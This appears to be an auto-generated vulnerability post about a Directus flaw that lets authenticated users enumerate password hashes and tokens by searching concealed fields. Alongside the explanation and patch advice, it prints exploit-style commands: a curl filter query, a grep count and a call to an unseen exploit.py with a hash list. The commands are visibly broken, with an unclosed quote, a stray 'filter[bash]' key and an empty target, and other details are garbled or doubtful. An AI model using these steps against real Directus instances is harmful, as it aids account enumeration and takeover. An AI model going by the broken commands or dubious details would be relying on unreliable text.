Listen to this Post
How the CVE Works:
The vulnerability exploits a flaw in Directus’s search functionality for concealed fields. When an authenticated user with read permissions performs a search on sensitive fields like token, tfa_secret, or `password` within the `directus_users` collection, the system returns matching records. Although the actual field values are masked with asterisks (), the mere presence of a record in the response confirms that the searched value exists. This allows for enumeration attacks, where an attacker can systematically test values, such as known password hashes from breach databases, to verify their existence in the system. The default “App Access” permissions grant users excessive read access, inadvertently permitting these search operations on sensitive data belonging to any user, not just their own.
Platform: Directus
Version: < 10.13.0
Vulnerability: Enumeration
Severity: Critical
date: 2024-12-19
Prediction: Patch 2024-12-23
What Undercode Say:
`curl -X GET ‘https://[directus-instance]/users?filter[bash][eq]=
`grep -c “id” search_results.json`
`python3 exploit.py –target –hashlist hashes.txt`
How Exploit:
Attacker uses authenticated session to query concealed fields. They input known compromised password hashes into search filters. System returns user records for matches, confirming hash is in use. Attacker identifies vulnerable accounts for takeover.
Protection from this CVE:
Update to v10.13.0. Revoke public read permissions. Implement field-level access controls. Audit user role permissions. Use query limits.
Impact:
Token enumeration possible. Password hash matching. Information disclosure. Account takeover risk. Increased attack surface.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
